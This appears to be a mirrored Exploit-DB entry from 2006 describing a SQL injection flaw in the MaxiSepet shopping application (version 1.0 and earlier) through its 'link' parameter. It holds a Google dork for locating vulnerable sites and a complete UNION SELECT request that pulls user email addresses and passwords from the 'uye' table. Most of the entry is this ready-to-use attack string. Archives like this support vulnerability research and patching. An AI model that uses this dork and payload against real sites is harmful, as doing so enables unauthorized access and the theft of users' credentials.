bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/1900.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
635 B
Text
Raw Permalink Blame History

#Method found by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.
#Dork: "Copyright MaxiSepet ©"
#How: Parameter link did not sanitized properly.
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# nukedx.com [2006-06-11]
# milw0rm.com [2006-06-11]
Reference in a new issue View git blame Copy permalink